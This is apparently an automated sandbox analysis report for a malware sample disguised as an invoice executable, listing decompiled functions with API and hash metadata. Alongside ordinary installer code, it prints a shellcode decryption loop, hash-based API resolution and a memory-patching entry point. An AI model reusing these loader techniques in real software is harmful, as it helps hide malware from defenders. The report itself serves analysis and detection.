                                                • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                • Instruction Fuzzy Hash: 35E0EC3222065AABDF109E659C04AEB7B6CEF05360F008837FE55F3190D635E9219BA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405CE5(void* _a4, void* _a8, long _a12) {
                                                				int _t7;
                                                				long _t11;
                                                
                                                				_t11 = _a12;
                                                				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                				if(_t7 == 0 || _t11 != _a12) {
                                                					return 0;
                                                				} else {
                                                					return 1;
                                                				}
                                                			}






                                                APIs
                                                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032DA,00000000,00000000,00403127,000000FF,00000004,00000000,00000000,00000000), ref: 00405CF9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                • Instruction ID: 359c21f91a3bba3ce6496bf321611394009143f850dd69016ead32bb33babeaa
                                                • Opcode Fuzzy Hash: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                • Instruction Fuzzy Hash: 08E0863210011EABCF106E909C08FEB775CEF00350F048433FD15E2040E230E8209BA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                
                                                				 *0x72ab4038 = _a4;
                                                				if(_a8 == 1) {
                                                					VirtualProtect(0x72ab404c, 4, 0x40, 0x72ab403c); // executed
                                                					 *0x72ab404c = 0xc2;
                                                					 *0x72ab403c = 0;
                                                					 *0x72ab4044 = 0;
                                                					 *0x72ab4058 = 0;
                                                					 *0x72ab4048 = 0;
                                                					 *0x72ab4040 = 0;
                                                					 *0x72ab4050 = 0;
                                                					 *0x72ab404e = 0;
                                                				}
                                                				return 1;
                                                			}




                                                APIs
                                                • VirtualProtect.KERNELBASE(72AB404C,00000004,00000040,72AB403C), ref: 72AB293F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.688800351.0000000072AB1000.00000020.00020000.sdmp, Offset: 72AB0000, based on PE: true
                                                • Associated: 00000000.00000002.688792553.0000000072AB0000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.688807982.0000000072AB3000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.688815540.0000000072AB5000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: e5ddae0404f5113deddbb3244b09a7cd1eb6ca5fb2cd9f2fda9666e90e9cf3a4
                                                • Instruction ID: 76ca3180523956c4218484a4587c466a9874971bbe29a24ea528d66785d291e6
                                                • Opcode Fuzzy Hash: e5ddae0404f5113deddbb3244b09a7cd1eb6ca5fb2cd9f2fda9666e90e9cf3a4
                                                • Instruction Fuzzy Hash: DCF09BB3A88281EEC361CF6A88A47053FF4BB18354B224D6EE598D6261E33C8146CB11
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004032DD(long _a4) {
                                                				long _t2;
                                                
                                                				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                				return _t2;
                                                			}





                                                APIs
                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403066,?), ref: 004032EB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                • Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
                                                • Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                • Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			E10003DDD() {
                                                				intOrPtr _v8;
                                                				intOrPtr _v12;
                                                				short _v16;
                                                				short _v18;
                                                				short _v20;
                                                				short _v22;
                                                				short _v24;
                                                				short _v26;
                                                				short _v28;
                                                				short _v30;
                                                				short _v32;
                                                				intOrPtr _v36;
                                                				intOrPtr _v40;
                                                				signed int _v44;
                                                				intOrPtr _v48;
                                                				signed int _v52;
                                                				intOrPtr _v56;
                                                				intOrPtr _v60;
                                                				intOrPtr _v64;
                                                				intOrPtr _v68;
                                                				intOrPtr _v72;
                                                				intOrPtr _v76;
                                                				intOrPtr _v80;
                                                				signed int _v84;
                                                				signed int _v88;
                                                				signed int _v92;
                                                				char _v1132;
                                                				short _t45;
                                                				short _t46;
                                                				short _t47;
                                                				short _t48;
                                                				short _t49;
                                                				short _t50;
                                                				short _t51;
                                                				short _t52;
                                                				void* _t68;
                                                				void* _t69;
                                                				void* _t70;
                                                
                                                				_v92 = _v92 & 0x00000000;
                                                				_v88 = _v88 & 0x00000000;
                                                				_v44 = _v44 & 0x00000000;
                                                				_v84 = _v84 & 0x00000000;
                                                				_v52 = _v52 & 0x00000000;
                                                				_t45 = 0x41;
                                                				_v32 = _t45;
                                                				_t46 = 0x4f;
                                                				_v30 = _t46;
                                                				_t47 = 0x78;
                                                				_v28 = _t47;
                                                				_t48 = 0x6b;
                                                				_v26 = _t48;
                                                				_t49 = 0x2e;
                                                				_v24 = _t49;
                                                				_t50 = 0x65;
                                                				_v22 = _t50;
                                                				_t51 = 0x78;
                                                				_v20 = _t51;
                                                				_t52 = 0x65;
                                                				_v18 = _t52;
                                                				_v16 = 0;
                                                				_v8 = E10003F0F();
                                                				_v76 = E10003FB3(_v8, 0x34cf0bf);
                                                				_v60 = E10003FB3(_v8, 0x55e38b1f);
                                                				_v12 = E10003FB3(_v8, 0xd1775dc4);
                                                				_v36 = E10003FB3(_v8, 0xd6eb2188);
                                                				_v68 = E10003FB3(_v8, 0xa2eae210);
                                                				_v40 = E10003FB3(_v8, 0xcd8538b2);
                                                				_v48 = E10003FB3(_v8, 0x8a111d91);
                                                				_v56 = E10003FB3(_v8, 0x170c1ca1);
                                                				_v64 = E10003FB3(_v8, 0xa5f15738);
                                                				_v72 = E10003FB3(_v8, 0x433a3842);
                                                				_v80 = E10003FB3(_v8, 0x2ffe2c64);
                                                				_v12(0,  &_v1132, 0x103);
                                                				_t68 = E10003111(_t69, _t70, 0, 0x404000); // executed
                                                				return _t68;
                                                			}










































                                                Memory Dump Source
                                                • Source File: 00000000.00000002.688785234.0000000010003000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.688758072.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.688771006.0000000010001000.00000020.00020000.sdmp
                                                • Associated: 00000000.00000002.688778149.0000000010002000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fd08ddc07963bf73051f318a0493ee9ca2708dcfb4daf06d90f8ff853a1d516d
                                                • Instruction ID: 60e19f0a28707b3d5312e6ec7323f3949b6f6957e07d096bed54a162a10781dc
                                                • Opcode Fuzzy Hash: fd08ddc07963bf73051f318a0493ee9ca2708dcfb4daf06d90f8ff853a1d516d
                                                • Instruction Fuzzy Hash: 9D3119B8D84209BEEF11DBE0DE42BBDFBB5EF00711F204066F504B92A5D7B11A44AB84
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 95%
                                                			E10001130(intOrPtr _a4) {
                                                				signed int _v5;
                                                				signed int _v12;
                                                				void* _t60;
                                                
                                                				_v12 = 0;
                                                				E10001000();
                                                				_v12 = 0;
                                                				while(_v12 < 0x1205) {
                                                					_t7 = _v12 + E10003000; // 0x0
                                                					_v5 =  *_t7;
                                                					_v5 =  !(_v5 & 0x000000ff);
                                                					_v5 = (_v5 & 0x000000ff) >> 0x00000006 | (_v5 & 0x000000ff) << 0x00000002;
                                                					_v5 = (_v5 & 0x000000ff) - _v12;
                                                					_v5 =  !(_v5 & 0x000000ff);
                                                					_v5 =  ~(_v5 & 0x000000ff);
                                                					_v5 = _v5 & 0x000000ff ^ 0x000000c2;
                                                					_v5 = (_v5 & 0x000000ff) - 0xce;
                                                					_v5 =  ~(_v5 & 0x000000ff);
                                                					_v5 = (_v5 & 0x000000ff) - _v12;
                                                					_v5 = _v5 & 0x000000ff ^ _v12;
                                                					_v5 =  !(_v5 & 0x000000ff);
                                                					_v5 = _v5 & 0x000000ff ^ _v12;
                                                					_v5 = (_v5 & 0x000000ff) + _v12;
                                                					_v5 = _v5 & 0x000000ff ^ _v12;
                                                					_v5 =  !(_v5 & 0x000000ff);
                                                					_v5 = (_v5 & 0x000000ff) + _v12;
                                                					_v5 =  ~(_v5 & 0x000000ff);
                                                					_v5 = (_v5 & 0x000000ff) + _v12;
                                                					 *((char*)(_v12 + E10003000)) = _v5;
                                                					_v12 = _v12 + 1;
                                                				}
                                                				_push(_a4);
                                                				_t60 = E10003000(); // executed
                                                				return _t60;
                                                			}







                                                Memory Dump Source
                                                • Source File: 00000000.00000002.688771006.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.688758072.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.688778149.0000000010002000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.688785234.0000000010003000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4983f0d5801d97e5484fa764f13c35c9b0ec37b9e13028955cf984d4811e56c3
                                                • Instruction ID: 9030057b0dfacb121c6692da68b1d7901575be1d1923824d15e481a2d0c0faef
                                                • Opcode Fuzzy Hash: 4983f0d5801d97e5484fa764f13c35c9b0ec37b9e13028955cf984d4811e56c3
                                                • Instruction Fuzzy Hash: 2B41B92484D2D8AADF06CBF984A13ECFFB45E6A102F0881C9D4D566387C53A538EDB21
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                C-Code - Quality: 95%
                                                			E00405339(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                				struct HWND__* _v8;
                                                				struct tagRECT _v24;
                                                				void* _v32;
                                                				signed int _v36;
                                                				int _v40;
                                                				int _v44;
                                                				signed int _v48;
                                                				int _v52;
                                                				void* _v56;
                                                				void* _v64;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				struct HWND__* _t89;
                                                				long _t90;
                                                				int _t95;
                                                				void* _t102;
                                                				intOrPtr _t124;
                                                				struct HWND__* _t128;
                                                				int _t150;
                                                				int _t153;
                                                				long _t157;
                                                				struct HWND__* _t161;
                                                				struct HMENU__* _t163;
                                                				long _t165;
                                                				void* _t166;
                                                				char* _t167;
                                                				char* _t168;
                                                				int _t169;
                                                
                                                				_t157 = _a8;
                                                				_t150 = 0;
                                                				_v8 =  *0x7a2744;
                                                				if(_t157 != 0x110) {
                                                					if(_t157 == 0x405) {
                                                						CloseHandle(CreateThread(0, 0, E004052CD, GetDlgItem(_a4, 0x3ec), 0,  &_a8));
                                                					}
                                                					if(_t157 != 0x111) {
                                                						L17:
                                                						if(_t157 != 0x404) {
                                                							L25:
                                                							if(_t157 != 0x7b) {
                                                								goto L20;
                                                							}
                                                							_t89 = _v8;
                                                							if(_a12 != _t89) {
                                                								goto L20;
                                                							}
                                                							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
                                                							_a12 = _t90;
                                                							if(_t90 <= _t150) {
                                                								L36:
                                                								return 0;
                                                							}
                                                							_t163 = CreatePopupMenu();
                                                							AppendMenuA(_t163, _t150, 1, E00406167(_t150, _t157, _t163, _t150, 0xffffffe1));
                                                							_t95 = _a16;
                                                							_t153 = _a16 >> 0x10;
                                                							if(_a16 == 0xffffffff) {
                                                								GetWindowRect(_v8,  &_v24);
                                                								_t95 = _v24.left;
                                                								_t153 = _v24.top;
                                                							}
                                                							if(TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150) == 1) {
                                                								_t165 = 1;
                                                								_v56 = _t150;
                                                								_v44 = 0x79f568;
                                                								_v40 = 0x1000;
                                                								_a4 = _a12;
                                                								do {
                                                									_a4 = _a4 - 1;
                                                									_t165 = _t165 + SendMessageA(_v8, 0x102d, _a4,  &_v64) + 2;
                                                								} while (_a4 != _t150);
                                                								OpenClipboard(_t150);
                                                								EmptyClipboard();
                                                								_t102 = GlobalAlloc(0x42, _t165);
                                                								_a4 = _t102;
                                                								_t166 = GlobalLock(_t102);
                                                								do {
                                                									_v44 = _t166;
                                                									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
                                                									 *_t167 = 0xd;
                                                									_t168 = _t167 + 1;
                                                									 *_t168 = 0xa;
                                                									_t166 = _t168 + 1;
                                                									_t150 = _t150 + 1;
                                                								} while (_t150 < _a12);
                                                								GlobalUnlock(_a4);
                                                								SetClipboardData(1, _a4);
                                                								CloseClipboard();
                                                							}
                                                							goto L36;
                                                						}
                                                						if( *0x7a272c == _t150) {
                                                							ShowWindow( *0x7a2f68, 8);
                                                							if( *0x7a300c == _t150) {
                                                								E004051FB( *((intOrPtr*)( *0x79ed40 + 0x34)), _t150);
                                                							}
                                                							E00404131(1);
                                                							goto L25;
                                                						}
                                                						 *0x79e938 = 2;
                                                						E00404131(0x78);
                                                						goto L20;
                                                					} else {
                                                						if(_a12 != 0x403) {
                                                							L20:
                                                							return E004041BF(_t157, _a12, _a16);
                                                						}
                                                						ShowWindow( *0x7a2730, _t150);
                                                						ShowWindow(_v8, 8);
                                                						E0040418D(_v8);
                                                						goto L17;
                                                					}
                                                				}
                                                				_v48 = _v48 | 0xffffffff;
                                                				_v36 = _v36 | 0xffffffff;
                                                				_t169 = 2;
                                                				_v56 = _t169;
                                                				_v52 = 0;
                                                				_v44 = 0;
                                                				_v40 = 0;
                                                				asm("stosd");
                                                				asm("stosd");
                                                				_t124 =  *0x7a2f74;
                                                				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
                                                				_a8 =  *((intOrPtr*)(_t124 + 0x60));
                                                				 *0x7a2730 = GetDlgItem(_a4, 0x403);
                                                				 *0x7a2728 = GetDlgItem(_a4, 0x3ee);
                                                				_t128 = GetDlgItem(_a4, 0x3f8);
                                                				 *0x7a2744 = _t128;
                                                				_v8 = _t128;
                                                				E0040418D( *0x7a2730);
                                                				 *0x7a2734 = E00404A7E(4);
                                                				 *0x7a274c = 0;
                                                				GetClientRect(_v8,  &_v24);
                                                				_v48 = _v24.right - GetSystemMetrics(_t169);
                                                				SendMessageA(_v8, 0x101b, 0,  &_v56);
                                                				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
                                                				if(_a12 >= 0) {
                                                					SendMessageA(_v8, 0x1001, 0, _a12);
                                                					SendMessageA(_v8, 0x1026, 0, _a12);
                                                				}
                                                				if(_a8 >= _t150) {
                                                					SendMessageA(_v8, 0x1024, _t150, _a8);
                                                				}
                                                				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                				_push(0x1b);
                                                				E00404158(_a4);
                                                				if(( *0x7a2f7c & 0x00000003) != 0) {
                                                					ShowWindow( *0x7a2730, _t150);
                                                					if(( *0x7a2f7c & 0x00000002) != 0) {
                                                						 *0x7a2730 = _t150;
                                                					} else {
                                                						ShowWindow(_v8, 8);
                                                					}
                                                					E0040418D( *0x7a2728);
                                                				}
                                                				_t161 = GetDlgItem(_a4, 0x3ec);
                                                				SendMessageA(_t161, 0x401, _t150, 0x75300000);
                                                				if(( *0x7a2f7c & 0x00000004) != 0) {
                                                					SendMessageA(_t161, 0x409, _t150, _a8);
                                                					SendMessageA(_t161, 0x2001, _t150, _a12);
                                                				}
                                                				goto L36;
                                                 			}

                                                APIs
                                                • GetDlgItem.USER32 ref: 00405398
                                                • GetDlgItem.USER32 ref: 004053A7
                                                • GetClientRect.USER32 ref: 004053E4
                                                • GetSystemMetrics.USER32 ref: 004053EB
                                                • SendMessageA.USER32 ref: 0040540C
                                                • SendMessageA.USER32 ref: 0040541D
                                                • SendMessageA.USER32 ref: 00405430
                                                • SendMessageA.USER32 ref: 0040543E
                                                • SendMessageA.USER32 ref: 00405451
                                                • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405473
                                                • ShowWindow.USER32(?,00000008), ref: 00405487
                                                • GetDlgItem.USER32 ref: 004054A8
                                                • SendMessageA.USER32 ref: 004054B8
                                                • SendMessageA.USER32 ref: 004054D1
                                                • SendMessageA.USER32 ref: 004054DD
                                                • GetDlgItem.USER32 ref: 004053B6
                                                  • Part of subcall function 0040418D: SendMessageA.USER32 ref: 0040419B
                                                • GetDlgItem.USER32 ref: 004054F9
                                                • CreateThread.KERNEL32(00000000,00000000,Function_000052CD,00000000), ref: 00405507
                                                • CloseHandle.KERNEL32(00000000), ref: 0040550E
                                                • ShowWindow.USER32(00000000), ref: 00405531
                                                • ShowWindow.USER32(?,00000008), ref: 00405538
                                                • ShowWindow.USER32(00000008), ref: 0040557E
                                                • SendMessageA.USER32 ref: 004055B2
                                                • CreatePopupMenu.USER32 ref: 004055C3
                                                • AppendMenuA.USER32 ref: 004055D8
                                                • GetWindowRect.USER32 ref: 004055F8
                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405611
                                                • SendMessageA.USER32 ref: 0040564D
                                                • OpenClipboard.USER32(00000000), ref: 0040565D
                                                • EmptyClipboard.USER32 ref: 00405663
                                                • GlobalAlloc.KERNEL32(00000042,?), ref: 0040566C
                                                • GlobalLock.KERNEL32 ref: 00405676
                                                • SendMessageA.USER32 ref: 0040568A
                                                • GlobalUnlock.KERNEL32(00000000), ref: 004056A3
                                                • SetClipboardData.USER32(00000001,00000000), ref: 004056AE
                                                • CloseClipboard.USER32 ref: 004056B4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                • String ID:
                                                • API String ID: 590372296-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 78%
                                                			E004045EA(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				long _v16;
                                                				long _v20;
                                                				long _v24;
                                                				char _v28;
                                                				intOrPtr _v32;
                                                				long _v36;
                                                				char _v40;
                                                				unsigned int _v44;
                                                				signed int _v48;
                                                				CHAR* _v56;
                                                				intOrPtr _v60;
                                                				intOrPtr _v64;
                                                				intOrPtr _v68;
                                                				CHAR* _v72;
                                                				void _v76;
                                                				struct HWND__* _v80;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				intOrPtr _t82;
                                                				long _t87;
                                                				signed char* _t89;
                                                				void* _t95;
                                                				signed int _t96;
                                                				int _t109;
                                                				signed char _t114;
                                                				signed int _t118;
                                                				struct HWND__** _t122;
                                                				intOrPtr* _t138;
                                                				CHAR* _t146;
                                                				unsigned int _t150;
                                                				signed int _t152;
                                                				unsigned int _t156;
                                                				signed int _t158;
                                                				signed int* _t159;
                                                				signed char* _t160;
                                                				struct HWND__* _t165;
                                                				struct HWND__* _t166;
                                                				int _t168;
                                                				unsigned int _t197;
                                                
                                                				_t156 = __edx;
                                                				_t82 =  *0x79ed40;
                                                				_v32 = _t82;
                                                				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x7a4000;
                                                				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                				if(_a8 == 0x40b) {
                                                					E004057D4(0x3fb, _t146);
                                                					E004063AF(_t146);
                                                				}
                                                				_t166 = _a4;
                                                				if(_a8 != 0x110) {
                                                					L8:
                                                					if(_a8 != 0x111) {
                                                						L20:
                                                						if(_a8 == 0x40f) {
                                                							L22:
                                                							_v8 = _v8 & 0x00000000;
                                                							_v12 = _v12 & 0x00000000;
                                                							E004057D4(0x3fb, _t146);
                                                							if(E00405B5A(_t185, _t146) == 0) {
                                                								_v8 = 1;
                                                							}
                                                							E004060D4(0x79e538, _t146);
                                                							_t87 = E004064DD(1);
                                                							_v16 = _t87;
                                                							if(_t87 == 0) {
                                                								L30:
                                                								E004060D4(0x79e538, _t146);
                                                								_t89 = E00405B05(0x79e538);
                                                								_t158 = 0;
                                                								if(_t89 != 0) {
                                                									 *_t89 =  *_t89 & 0x00000000;
                                                								}
                                                								if(GetDiskFreeSpaceA(0x79e538,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                									goto L35;
                                                								} else {
                                                									_t168 = 0x400;
                                                									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                									asm("cdq");
                                                									_v48 = _t109;
                                                									_v44 = _t156;
                                                									_v12 = 1;
                                                									goto L36;
                                                								}
                                                							} else {
                                                								_t159 = 0;
                                                								if(0 == 0x79e538) {
                                                									goto L30;
                                                								} else {
                                                									goto L26;
                                                								}
                                                								while(1) {
                                                									L26:
                                                									_t114 = _v16(0x79e538,  &_v48,  &_v28,  &_v40);
                                                									if(_t114 != 0) {
                                                										break;
                                                									}
                                                									if(_t159 != 0) {
                                                										 *_t159 =  *_t159 & _t114;
                                                									}
                                                									_t160 = E00405AB3(0x79e538);
                                                									 *_t160 =  *_t160 & 0x00000000;
                                                									_t159 = _t160 - 1;
                                                									 *_t159 = 0x5c;
                                                									if(_t159 != 0x79e538) {
                                                										continue;
                                                									} else {
                                                										goto L30;
                                                									}
                                                								}
                                                								_t150 = _v44;
                                                								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                								_v44 = _t150 >> 0xa;
                                                								_v12 = 1;
                                                								_t158 = 0;
                                                								__eflags = 0;
                                                								L35:
                                                								_t168 = 0x400;
                                                								L36:
                                                								_t95 = E00404A7E(5);
                                                								if(_v12 != _t158) {
                                                									_t197 = _v44;
                                                									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                										_v8 = 2;
                                                									}
                                                								}
                                                								if( *((intOrPtr*)( *0x7a273c + 0x10)) != _t158) {
                                                									E00404A66(0x3ff, 0xfffffffb, _t95);
                                                									if(_v12 == _t158) {
                                                										SetDlgItemTextA(_a4, _t168, 0x79e528);
                                                									} else {
                                                										E004049A1(_t168, 0xfffffffc, _v48, _v44);
                                                									}
                                                								}
                                                								_t96 = _v8;
                                                								 *0x7a3024 = _t96;
                                                								if(_t96 == _t158) {
                                                									_v8 = E0040140B(7);
                                                								}
                                                								if(( *(_v32 + 0x14) & _t168) != 0) {
                                                									_v8 = _t158;
                                                								}
                                                								E0040417A(0 | _v8 == _t158);
                                                								if(_v8 == _t158 &&  *0x79f558 == _t158) {
                                                									E00404543();
                                                								}
                                                								 *0x79f558 = _t158;
                                                								goto L53;
                                                							}
                                                						}
                                                						_t185 = _a8 - 0x405;
                                                						if(_a8 != 0x405) {
                                                							goto L53;
                                                						}
                                                						goto L22;
                                                					}
                                                					_t118 = _a12 & 0x0000ffff;
                                                					if(_t118 != 0x3fb) {
                                                						L12:
                                                						if(_t118 == 0x3e9) {
                                                							_t152 = 7;
                                                							memset( &_v76, 0, _t152 << 2);
                                                							_v80 = _t166;
                                                							_v72 = 0x79f568;
                                                							_v60 = E0040493B;
                                                							_v56 = _t146;
                                                							_v68 = E00406167(_t146, 0x79f568, _t166, 0x79e940, _v12);
                                                							_t122 =  &_v80;
                                                							_v64 = 0x41;
                                                							__imp__SHBrowseForFolderA(_t122);
                                                							if(_t122 == 0) {
                                                								_a8 = 0x40f;
                                                							} else {
                                                								__imp__CoTaskMemFree(_t122);
                                                								E00405A6C(_t146);
                                                								_t125 =  *((intOrPtr*)( *0x7a2f74 + 0x11c));
                                                								if( *((intOrPtr*)( *0x7a2f74 + 0x11c)) != 0 && _t146 == "C:\\Users\\jones\\AppData\\Local\\Temp") {
                                                									E00406167(_t146, 0x79f568, _t166, 0, _t125);
                                                									if(lstrcmpiA(0x7a1f00, 0x79f568) != 0) {
                                                										lstrcatA(_t146, 0x7a1f00);
                                                									}
                                                								}
                                                								 *0x79f558 =  *0x79f558 + 1;
                                                								SetDlgItemTextA(_t166, 0x3fb, _t146);
                                                							}
                                                						}
                                                						goto L20;
                                                					}
                                                					if(_a12 >> 0x10 != 0x300) {
                                                						goto L53;
                                                					}
                                                					_a8 = 0x40f;
                                                					goto L12;
                                                				} else {
                                                					_t165 = GetDlgItem(_t166, 0x3fb);
                                                					if(E00405AD9(_t146) != 0 && E00405B05(_t146) == 0) {
                                                						E00405A6C(_t146);
                                                					}
                                                					 *0x7a2738 = _t166;
                                                					SetWindowTextA(_t165, _t146);
                                                					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                					_push(1);
                                                					E00404158(_t166);
                                                					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                					_push(0x14);
                                                					E00404158(_t166);
                                                					E0040418D(_t165);
                                                					_t138 = E004064DD(8);
                                                					if(_t138 == 0) {
                                                						L53:
                                                						return E004041BF(_a8, _a12, _a16);
                                                					} else {
                                                						 *_t138(_t165, 1);
                                                						goto L8;
                                                					}
                                                				}
                                                			}

                                                APIs
                                                • GetDlgItem.USER32 ref: 00404639
                                                • SetWindowTextA.USER32(00000000,?), ref: 00404663
                                                • SHBrowseForFolderA.SHELL32(?,0079E940,?), ref: 00404714
                                                • CoTaskMemFree.OLE32(00000000), ref: 0040471F
                                                • lstrcmpiA.KERNEL32(007A1F00,0079F568,00000000,?,?), ref: 00404751
                                                • lstrcatA.KERNEL32(?,007A1F00), ref: 0040475D
                                                • SetDlgItemTextA.USER32 ref: 0040476F
                                                  • Part of subcall function 004057D4: GetDlgItemTextA.USER32 ref: 004057E7
                                                  • Part of subcall function 004063AF: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe" ,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403300,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00406407
                                                  • Part of subcall function 004063AF: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406414
                                                  • Part of subcall function 004063AF: CharNextA.USER32(?,"C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe" ,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403300,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00406419
                                                  • Part of subcall function 004063AF: CharPrevA.USER32(?,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403300,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00406429
                                                • GetDiskFreeSpaceA.KERNEL32(0079E538,?,?,0000040F,?,0079E538,0079E538,?,00000001,0079E538,?,?,000003FB,?), ref: 0040482D
                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404848
                                                  • Part of subcall function 004049A1: lstrlenA.KERNEL32(0079F568,0079F568,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048BC,000000DF,00000000,00000400,?), ref: 00404A3F
                                                  • Part of subcall function 004049A1: wsprintfA.USER32 ref: 00404A47
                                                  • Part of subcall function 004049A1: SetDlgItemTextA.USER32 ref: 00404A5A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: 8y$A$C:\Users\user\AppData\Local\Temp
                                                • API String ID: 2624150263-1129824994
                                                • Opcode ID: 0a6a5836e72cd0f58b1e28fdcfe34536ea1e5235d75c7b8d63da3860149ea9d6
                                                • Instruction ID: 0969ed353920fe7c0c653b0854d10b45f8508fdea16f9d8b9f06e94c3a270cc6
                                                • Opcode Fuzzy Hash: 0a6a5836e72cd0f58b1e28fdcfe34536ea1e5235d75c7b8d63da3860149ea9d6
